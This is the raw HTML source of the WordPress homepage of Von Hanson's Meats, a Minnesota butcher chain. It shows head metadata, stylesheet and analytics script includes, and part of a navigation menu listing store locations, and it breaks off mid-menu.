<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" prefix="og: http://ogp.me/ns#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/><title>Welcome to Von Hanson&#039;s Meats - Von Hanson&#039;s Meats</title> <meta name="specificfeeds-verification-code-aEsrbmNLZ25mQVhqZFpUQzRhWlZEVVMwcGttS1VnMWtlTWg5akZkMUdYaU5xUXBtalAyZmxicUV3dW1QQVYxZVk3VCtZYi8vcHR6cFFzNFIxK05BZU1kb2t4Q2kxbVJzbUk1bkh1R0tlWXlIVGZnMWxhclA2N242NGdaQk1EZ298OEZ0N0cxTjg1VGZVeHVJaFd5L1RNNFlCZzY2eTRvUWtuQThsbDVxWFdkUT0=" content="CVPevgK7CdpGplJN6B6P"/><script>window._wca = window._wca || [];</script> <!-- This site is optimized with the Yoast SEO plugin v10.1.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Von Hanson&#039;s celebrating 33 years of the best meats, deli and bakery. 23 Minnesota Locations. The Friendly Old Fashion Meat Market. More Then Just a Butcher"/> <link rel="canonical" href="https://vonhansons.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Welcome to Von Hanson&#039;s Meats - Von Hanson&#039;s Meats" /> <meta property="og:description" content="Von Hanson&#039;s celebrating 33 years of the best meats, deli and bakery. 23 Minnesota Locations. The Friendly Old Fashion Meat Market. More Then Just a Butcher" /> <meta property="og:url" content="https://vonhansons.com/" /> <meta property="og:site_name" content="Von Hanson&#039;s Meats" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Von Hanson&#039;s celebrating 33 years of the best meats, deli and bakery. 23 Minnesota Locations. The Friendly Old Fashion Meat Market. More Then Just a Butcher" /> <meta name="twitter:title" content="Welcome to Von Hanson&#039;s Meats - Von Hanson&#039;s Meats" /> <meta name="twitter:image" content="https://vonhansons.com/wp-content/uploads/2016/06/Sausage.jpg" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"https://vonhansons.com/#website","url":"https://vonhansons.com/","name":"Von Hanson&#039;s Meats","potentialAction":{"@type":"SearchAction","target":"https://vonhansons.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <meta name="msvalidate.01" content="F815EC9C9497E9F8265571B95BB38CCD" /> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//s0.wp.com' /> <link rel='dns-prefetch' href='//maps.googleapis.com' /> <link rel="alternate" type="application/rss+xml" title="Von Hanson&#039;s Meats &raquo; Feed" href="https://vonhansons.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Von Hanson&#039;s Meats &raquo; Comments Feed" href="https://vonhansons.com/comments/feed/" /> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='woocommerce-layout-css' href='https://vonhansons.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.5.0' type='text/css' media='all' /> <style id='woocommerce-layout-inline-css' type='text/css'> .infinite-scroll .woocommerce-pagination { display: none; } </style> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://vonhansons.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.5.0' type='text/css' media='only screen and (max-width: 768px)' /> <link rel='stylesheet' id='woocommerce-general-css' href='https://vonhansons.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.5.0' type='text/css' media='all' /> <style id='woocommerce-inline-inline-css' type='text/css'> .woocommerce form .form-row .required { visibility: visible; } .woocommerce form .form-row .required { visibility: visible; } </style> <link rel='stylesheet' id='photoswipe-css' href='https://vonhansons.com/wp-content/plugins/woocommerce/assets/css/photoswipe/photoswipe.css?ver=3.5.0' type='text/css' media='all' /> <link rel='stylesheet' id='photoswipe-default-skin-css' href='https://vonhansons.com/wp-content/plugins/woocommerce/assets/css/photoswipe/default-skin/default-skin.css?ver=3.5.0' type='text/css' media='all' /> <link rel='stylesheet' id='font-pe-icon-7-stroke-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/pixeden-stroke-7-icon/css/pe-icon-7-stroke.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='font-ion-icons-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/Ionicons/css/ionicons.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='font-themify-icons-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/themify-icons/css/themify-icons.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='perfect-scrollbar-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/perfect-scrollbar/css/perfect-scrollbar.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='select2-css' href='https://vonhansons.com/wp-content/plugins/woocommerce/assets/css/select2.css?ver=3.5.0' type='text/css' media='all' /> <link rel='stylesheet' id='hint-css-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/hint.css/css/hint.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='jquery-nice-select-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/jquery-nice-select/css/nice-select.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='slick-css-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/libs/slick-carousel/css/slick.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='bew-style-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/css/style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='font-awesome-css' href='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/font-awesome.min.css?ver=4.7.0' type='text/css' media='all' /> <style id='font-awesome-inline-css' type='text/css'> [data-font="FontAwesome"]:before {font-family: 'FontAwesome' !important;content: attr(data-icon) !important;speak: none !important;font-weight: normal !important;font-variant: normal !important;text-transform: none !important;line-height: 1 !important;font-style: normal !important;-webkit-font-smoothing: antialiased !important;-moz-osx-font-smoothing: grayscale !important;} </style> <link rel='stylesheet' id='simple-line-icons-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/css/third/simple-line-icons.min.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='bew-woocommerce-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/css/bew-woocommerce.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://vonhansons.com/wp-includes/css/dashicons.min.css?ver=4.9.10' type='text/css' media='all' /> <style id='dashicons-inline-css' type='text/css'> [data-font="Dashicons"]:before {font-family: 'Dashicons' !important;content: attr(data-icon) !important;speak: none !important;font-weight: normal !important;font-variant: normal !important;text-transform: none !important;line-height: 1 !important;font-style: normal !important;-webkit-font-smoothing: antialiased !important;-moz-osx-font-smoothing: grayscale !important;} </style> <link rel='stylesheet' id='jquery-fullPage-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/fullpage/css/jquery.fullPage.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='bew-fullpage-css' href='https://vonhansons.com/wp-content/plugins/briefcase-elementor-widgets/assets/css/bew-fullpage.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='genesis-sample-theme-css' href='https://vonhansons.com/wp-content/themes/vonhansons/style.css?ver=2.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='SFSIPLUSmainCss-css' href='https://vonhansons.com/wp-content/plugins/Ultimate-Premium-Plugin/css/sfsi-style.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://vonhansons.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='pc_google_analytics-frontend-css' href='https://vonhansons.com/wp-content/plugins/pc-google-analytics/assets/css/frontend.css?ver=1.0.0' type='text/css' media='all' /> <link rel='stylesheet' id='printomatic-css-css' href='https://vonhansons.com/wp-content/plugins/print-o-matic/css/style.css?ver=1.2' type='text/css' media='all' /> <link rel='stylesheet' id='hamburger.css-css' href='https://vonhansons.com/wp-content/plugins/wp-responsive-menu/css/wpr-hamburger.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='wprmenu.css-css' href='https://vonhansons.com/wp-content/plugins/wp-responsive-menu/css/wprmenu.css?ver=1.0' type='text/css' media='all' /> <style id='wprmenu.css-inline-css' type='text/css'> @media only screen and ( max-width: 960px ) {html body div.wprm-wrapper { overflow: scroll; } #mg-wprm-wrap ul li { border-top: solid 1px rgba(13,13,13,0.05); border-bottom: solid 1px rgba(19,18,18,0.05); } #wprmenu_bar { background-color: #0D0D0D; } html body div#mg-wprm-wrap .wpr_submit .icon.icon-search { color: #FFFFFF; } #wprmenu_bar .menu_title, #wprmenu_bar .wprmenu_icon_menu { color: #F2F2F2; } #wprmenu_bar .menu_title { font-size: 20px; font-weight: normal; } #mg-wprm-wrap li.menu-item a { font-size: 20px; text-transform: uppercase; font-weight: normal; } #mg-wprm-wrap li.menu-item-has-children ul.sub-menu a { font-size: 15px; text-transform: uppercase; font-weight: normal; } #mg-wprm-wrap li.current-menu-item > a { background: #d53f3f; } #mg-wprm-wrap li.current-menu-item > a, #mg-wprm-wrap li.current-menu-item span.wprmenu_icon{ color: #FFFFFF !important; } #mg-wprm-wrap { background-color: #2E2E2E; } .cbp-spmenu-push-toright { left: 80% ; } .cbp-spmenu-push-toright .mm-slideout { left:80% ; } .cbp-spmenu-push-toleft { left: -80% ; } #mg-wprm-wrap.cbp-spmenu-right, #mg-wprm-wrap.cbp-spmenu-left, #mg-wprm-wrap.cbp-spmenu-right.custom, #mg-wprm-wrap.cbp-spmenu-left.custom, .cbp-spmenu-vertical { width: 80%; max-width: 400px; } #mg-wprm-wrap ul#wprmenu_menu_ul li.menu-item a, div#mg-wprm-wrap ul li span.wprmenu_icon { color: #CFCFCF !important; } #mg-wprm-wrap ul#wprmenu_menu_ul li.menu-item a:hover { background: #d53f3f; color: #606060 !important; } div#mg-wprm-wrap ul>li:hover>span.wprmenu_icon { color: #606060 !important; } .wprmenu_bar .hamburger-inner, .wprmenu_bar .hamburger-inner::before, .wprmenu_bar .hamburger-inner::after { background: #FFFFFF; } .wprmenu_bar .hamburger:hover .hamburger-inner, .wprmenu_bar .hamburger:hover .hamburger-inner::before, .wprmenu_bar .hamburger:hover .hamburger-inner::after { background: #FFFFFF; } div.wprmenu_bar div.hamburger{padding-right: 6px !important;} #wprmenu_menu.left { width:80%; left: -80%; right: auto; } #wprmenu_menu.right { width:80%; right: -80%; left: auto; } html body div#wprmenu_bar { height : px; }#mg-wprm-wrap.cbp-spmenu-left, #mg-wprm-wrap.cbp-spmenu-right, #mg-widgetmenu-wrap.cbp-spmenu-widget-left, #mg-widgetmenu-wrap.cbp-spmenu-widget-right { top: px !important; } .wprmenu_bar .hamburger { float: left; } .wprmenu_bar #custom_menu_icon.hamburger { top: 0px; left: 0px; float: left !important; background-color: #CCCCCC; } #buttonHolder{ display: none !important; }.custMenu #custom_menu_icon { display: block; }html { padding-top: 42px !important; }#wprmenu_bar,#mg-wprm-wrap { display: block; } div#wpadminbar { position: fixed; }} </style> <link rel='stylesheet' id='wpr_icons-css' href='https://vonhansons.com/wp-content/plugins/wp-responsive-menu/inc/icons/style.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='gca-column-styles-css' href='https://vonhansons.com/wp-content/plugins/genesis-columns-advanced/css/gca-column-styles.css?ver=4.9.10' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-icons-css' href='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=4.3.0' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-animations-css' href='https://vonhansons.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=2.5.11' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-frontend-css' href='https://vonhansons.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.5.11' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-pro-css' href='https://vonhansons.com/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=2.1.9' type='text/css' media='all' /> <link rel='stylesheet' id='elementor-post-6-css' href='https://vonhansons.com/wp-content/uploads/elementor/css/post-6.css?ver=1554244624' type='text/css' media='all' /> <link rel='stylesheet' id='ubermenu-css' href='https://vonhansons.com/wp-content/plugins/ubermenu/pro/assets/css/ubermenu.min.css?ver=3.2.4' type='text/css' media='all' /> <link rel='stylesheet' id='ubermenu-font-awesome-css' href='https://vonhansons.com/wp-content/plugins/ubermenu/assets/css/fontawesome/css/font-awesome.min.css?ver=4.3' type='text/css' media='all' /> <link rel='stylesheet' id='jetpack_css-css' href='https://vonhansons.com/wp-content/plugins/jetpack/css/jetpack.css?ver=6.8' type='text/css' media='all' /> <link rel='stylesheet' id='csshero-main-stylesheet-css' href='https://vonhansons.com/wp-content/uploads/2018/10/csshero-static-style.css' type='text/css' media='all' /> <script type='text/javascript' src='https://vonhansons.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://vonhansons.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/pc-google-analytics/assets/js/frontend.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/wp-responsive-menu/js/modernizr.custom.js?ver=1.0'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/wp-responsive-menu/js/jquery.touchSwipe.min.js?ver=1.0'></script> <script type='text/javascript'> /* <![CDATA[ */ var wprmenu = {"zooming":"yes","from_width":"960","push_width":"400","menu_width":"80","parent_click":"yes","swipe":"yes","enable_overlay":""}; /* ]]> */ </script> <script type='text/javascript' src='https://vonhansons.com/wp-content/plugins/wp-responsive-menu/js/wprmenu.js?ver=1.0'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://vonhansons.com/wp-content/themes/genesis/lib/js/html5shiv.min.js?ver=3.7.3'></script> <![endif]--> <script type='text/javascript' src='https://vonhansons.com/wp-content/themes/vonhansons/js/runtime.js?ver=4.9.10'></script> <script type='text/javascript' src='https://vonhansons.com/wp-content/themes/vonhansons/js/swiffy.js?ver=4.9.10'></script> <link rel='https://api.w.org/' href='https://vonhansons.com/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://vonhansons.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 4.9.10" /> <meta name="generator" content="WooCommerce 3.5.0" /> <link rel='shortlink' href='https://vonhansons.com?p=6' /> <style type="text/css"></style> <script type='text/javascript' data-cfasync='false'>var _mmunch = {'front': false, 'page': false, 'post': false, 'category': false, 'author': false, 'search': false, 'attachment': false, 'tag': false};_mmunch['front'] = true;_mmunch['page'] = true; _mmunch['pageData'] = {"ID":6,"post_name":"welcome-von-hansons-meats","post_title":"Welcome to Von Hanson's Meats","post_type":"page","post_author":"2","post_status":"publish"};</script><script data-cfasync="false" src="//a.mailmunch.co/app/v1/site.js" id="mailmunch-script" data-plugin="mailmunch" data-mailmunch-site-id="592436" async></script> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-24005235-1', 'auto'); ga('send', 'pageview'); </script> <style id="ubermenu-custom-generated-css"> /** UberMenu Custom Menu Styles (Customizer) **/ /* main */ .ubermenu-main.ubermenu-transition-fade .ubermenu-item .ubermenu-submenu-drop { margin-top:0; } /* Status: Loaded from Transient */ </style> <link rel='dns-prefetch' href='//v0.wordpress.com'/> <link rel='dns-prefetch' href='//i0.wp.com'/> <link rel='dns-prefetch' href='//i1.wp.com'/> <link rel='dns-prefetch' href='//i2.wp.com'/> <style type='text/css'>img#wpstats{display:none}</style><link rel="pingback" href="https://vonhansons.com/xmlrpc.php" /> <style type="text/css">#header { background: url(https://vonhansons.com/wp-content/themes/vonhansons/images/header.png) no-repeat !important; }</style> <link rel="stylesheet" href="/wp-content/themes/vonhansons/printcss.css" type="text/css" media="print" /> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <style type="text/css"> html:not( .jetpack-lazy-images-js-enabled ) .jetpack-lazy-image { display: none; } </style> <script> document.documentElement.classList.add( 'jetpack-lazy-images-js-enabled' ); </script> <link rel="icon" href="https://i0.wp.com/vonhansons.com/wp-content/uploads/2018/05/cropped-VH-siteicon.png?fit=32%2C32&#038;ssl=1" sizes="32x32" /> <link rel="icon" href="https://i0.wp.com/vonhansons.com/wp-content/uploads/2018/05/cropped-VH-siteicon.png?fit=192%2C192&#038;ssl=1" sizes="192x192" /> <link rel="apple-touch-icon-precomposed" href="https://i0.wp.com/vonhansons.com/wp-content/uploads/2018/05/cropped-VH-siteicon.png?fit=180%2C180&#038;ssl=1" /> <meta name="msapplication-TileImage" content="https://i0.wp.com/vonhansons.com/wp-content/uploads/2018/05/cropped-VH-siteicon.png?fit=270%2C270&#038;ssl=1" /> <script async src='https://stats.wp.com/s-201920.js'></script> </head> <body class="home page-template-default page page-id-6 woocommerce-no-js header-full-width sidebar-content elementor-default elementor-page elementor-page-6"><div id="wrap"><div id="ovalLogo"></div> <div id="header"><div class="header-ghost"><div id="topHeader"> <div id="topHeaderSWF" style="width: 100%; height: 222px; background-image:url(/wp-content/themes/vonhansons/images/swfback.jpg); background-repeat: repeat-x;"><img src="http://dev.vonhansons.com/wp-content/uploads/2011/02/New-Wink-6.gif" style="height:195px; margin-left: 185px;"/> </div> <div id="buttonHolder"><div id="homeBtn"><a href="/" onmouseover="document.home.src='/wp-content/themes/thesis_18/custom/images/upperNav/homeO.jpg';" onmouseout="document.home.src='/wp-content/themes/thesis_18/custom/images/upperNav/homeN.jpg';"><img src="/wp-content/themes/thesis_18/custom/images/upperNav/homeN.jpg" name="home"></a></div> <div id="otherBtns"> <div id="nav"><div class="wrap"> <!-- UberMenu [Configuration:main] [Theme Loc:primary] [Integration:auto] --> <a class="ubermenu-responsive-toggle ubermenu-responsive-toggle-main ubermenu-skin-none ubermenu-loc-primary ubermenu-responsive-toggle-content-align-left ubermenu-responsive-toggle-align-full " data-ubermenu-target="ubermenu-main-5-primary"><i class="fa fa-bars"></i>Menu</a><nav id="ubermenu-main-5-primary" class="ubermenu ubermenu-nojs ubermenu-main ubermenu-menu-5 ubermenu-loc-primary ubermenu-responsive ubermenu-responsive-default ubermenu-responsive-collapse ubermenu-horizontal ubermenu-transition-shift ubermenu-trigger-hover_intent ubermenu-skin-none ubermenu-bar-align-full ubermenu-items-align-left ubermenu-bound ubermenu-disable-submenu-scroll ubermenu-sub-indicators ubermenu-retractors-responsive"><ul id="ubermenu-nav-main-5-primary" class="ubermenu-nav"><li id="menu-item-2123" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-2123 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-hide-desktop" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="/" tabindex="0"><span class="ubermenu-target-title ubermenu-target-text">Home</span></a></li><li id="menu-item-1428" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1428 ubermenu-item-level-0 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-drop ubermenu-has-submenu-mega ubermenu-disable-padding" ><span class="ubermenu-target ubermenu-target-with-image ubermenu-item-layout-default ubermenu-item-layout-image_left ubermenu-noindicator ubermenu-item-notext" tabindex="0"><img class="ubermenu-image ubermenu-image-size-full" src="https://i1.wp.com/vonhansons.com/wp-content/uploads/2016/06/transpix.png?fit=1%2C1&amp;ssl=1" width="1" height="1" alt="transpix" /></span><ul class="ubermenu-submenu ubermenu-submenu-id-1428 ubermenu-submenu-type-auto ubermenu-submenu-type-mega ubermenu-submenu-drop ubermenu-submenu-align-full_width" ><li id="menu-item-1441" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1441 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><span class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only ubermenu-noindicator"><span class="ubermenu-target-title ubermenu-target-text">MN (A-Ch)</span></span><ul class="ubermenu-submenu ubermenu-submenu-id-1441 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-1449" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1449 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/apple-valley/"><span class="ubermenu-target-title ubermenu-target-text">Apple Valley</span></a></li><li id="menu-item-1450" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1450 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/baxter/"><span class="ubermenu-target-title ubermenu-target-text">Baxter</span></a></li><li id="menu-item-1451" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1451 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/blaine/"><span class="ubermenu-target-title ubermenu-target-text">Blaine</span></a></li><li id="menu-item-1452" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1452 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/bloomington/"><span class="ubermenu-target-title ubermenu-target-text">Bloomington</span></a></li><li id="menu-item-1459" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1459 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/burnsville/"><span class="ubermenu-target-title ubermenu-target-text">Burnsville</span></a></li><li id="menu-item-1453" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1453 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/champlin/"><span class="ubermenu-target-title ubermenu-target-text">Champlin</span></a></li><li id="menu-item-1455" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1455 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/chanhassen/"><span class="ubermenu-target-title ubermenu-target-text">Chanhassen</span></a></li><li id="menu-item-1456" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1456 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/chaska/"><span class="ubermenu-target-title ubermenu-target-text">Chaska</span></a></li></ul></li><li id="menu-item-1442" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1442 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><span class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only"><span class="ubermenu-target-title ubermenu-target-text">MN (Co-N)</span></span><ul class="ubermenu-submenu ubermenu-submenu-id-1442 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-1457" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1457 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/coon-rapids/"><span class="ubermenu-target-title ubermenu-target-text">Coon Rapids</span></a></li><li id="menu-item-1458" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1458 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/cottage-grove/"><span class="ubermenu-target-title ubermenu-target-text">Cottage Grove</span></a></li><li id="menu-item-1460" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1460 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/eagan-2/"><span class="ubermenu-target-title ubermenu-target-text">Eagan</span></a></li><li id="menu-item-1461" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1461 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/elk-river/"><span class="ubermenu-target-title ubermenu-target-text">Elk River</span></a></li><li id="menu-item-1462" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1462 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/lakeville/"><span class="ubermenu-target-title ubermenu-target-text">Lakeville</span></a></li><li id="menu-item-1463" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1463 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/monticello/"><span class="ubermenu-target-title ubermenu-target-text">Monticello</span></a></li><li id="menu-item-1464" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1464 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/north-oaks/"><span class="ubermenu-target-title ubermenu-target-text">North Oaks</span></a></li></ul></li><li id="menu-item-1443" class="ubermenu-item ubermenu-item-type-custom ubermenu-item-object-custom ubermenu-item-has-children ubermenu-item-1443 ubermenu-item-auto ubermenu-item-header ubermenu-item-level-1 ubermenu-column ubermenu-column-auto ubermenu-has-submenu-stack" ><span class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only"><span class="ubermenu-target-title ubermenu-target-text">MN (P-W)</span></span><ul class="ubermenu-submenu ubermenu-submenu-id-1443 ubermenu-submenu-type-auto ubermenu-submenu-type-stack" ><li id="menu-item-1465" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1465 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/plymouth/"><span class="ubermenu-target-title ubermenu-target-text">Plymouth</span></a></li><li id="menu-item-1466" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1466 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/richfield/"><span class="ubermenu-target-title ubermenu-target-text">Richfield</span></a></li><li id="menu-item-1467" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1467 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default ubermenu-item-layout-text_only" href="https://vonhansons.com/rosemount/"><span class="ubermenu-target-title ubermenu-target-text">Rosemount</span></a></li><li id="menu-item-1468" class="ubermenu-item ubermenu-item-type-post_type ubermenu-item-object-page ubermenu-item-1468 ubermenu-item-auto ubermenu-item-normal ubermenu-item-level-2 ubermenu-column ubermenu-column-auto" ><a class="ubermenu-target ubermenu-item-layout-default 